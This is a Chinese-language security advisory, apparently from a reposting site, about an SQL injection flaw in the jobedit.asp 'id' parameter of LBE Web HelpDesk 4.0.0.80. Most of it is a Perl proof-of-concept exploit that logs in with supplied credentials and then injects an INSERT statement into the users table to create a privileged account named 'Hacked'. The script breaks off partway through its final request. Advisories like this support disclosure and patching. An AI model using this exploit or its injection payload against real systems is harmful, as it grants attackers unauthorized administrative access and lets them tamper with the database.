Leigh Business Enterprises Web HelpDesk SQL注…

发布日期：2004-07-21
更新日期：2004-07-27

受影响系统：

Leigh Business Enterprises Web HelpDesk 4.0.0.80

不受影响系统：

Leigh Business Enterprises Web HelpDesk 4.0.0.81

描述：

---

BUGTRAQ ID: 10773

LBE Web Helpdesk是一款可通过WEB浏览器进行操作的Helpdesk系统。

LBE Web Helpdesk不正确过滤用户提交的数据，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能获得敏感数据或修改数据库。

问题存在于jobedit.asp脚本对用户提交给'id'参数缺少过滤，提交包含恶意SQL命令的数据作为'id'参数，可修改'users'表，增加操作员相等权限的新用户。

<*来源：Noam Rathaus （noamr@beyondsecurity.com）

链接：http://www.securiteam.com/windowsntfocus/5QP0M0ADGI.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Noam Rathaus （noamr@beyondsecurity.com）提供了如下测试方法：

#!/usr/bin/perl

use IO::Socket;
use strict;

my $host = $ARGV[0];
my $Path = $ARGV[1];
my $Email = $ARGV[2];
my $Password = $ARGV[3];

if (($#ARGV 1) < 4)
{
print "lbehelpdesk.pl host path email password\n";
exit(0);
}

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "Getting default cookie\n";

my $http = "GET /$Path/oplogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
ge/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close

";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

my $Cookie = "";

while (<$remote>)
{
if (/Set-Cookie: ([^;] ;)/)
{
$Cookie .= $1." ";
}

# print $_;
}
print "\n";

close($remote);

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "Logging in\n";

$remote->autoflush(1);

my $http = "POST /$Path/gstlogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content = "txtemail=$Email&txtpwd=$Password";

$http .= length($content)."

$content";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

my $success = 0;
while (<$remote>)
{
if (/Location: eval.asp/)
{
$success = 1;
print "Login successfull\n";
}

# print $_;
}
print "\n";

close $remote;

if (!$success)
{
print "Login failed\n";
exit(0);
}

$http = "GET /$Path/jobedit.asp?id=0 ; INSERT INTO users ( user_name,".
" password, editactiontime, orgstructure, createviewtemplate,".
" removelogins, editlinkedfiles, newencrypt, showalljobs,".
" publishmacros, override_contract ) VALUES ('Hacked',".
" '60716363677F6274', 1, 1, 1, 1, 1, 'Y', 1,".
" 1, 1) HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有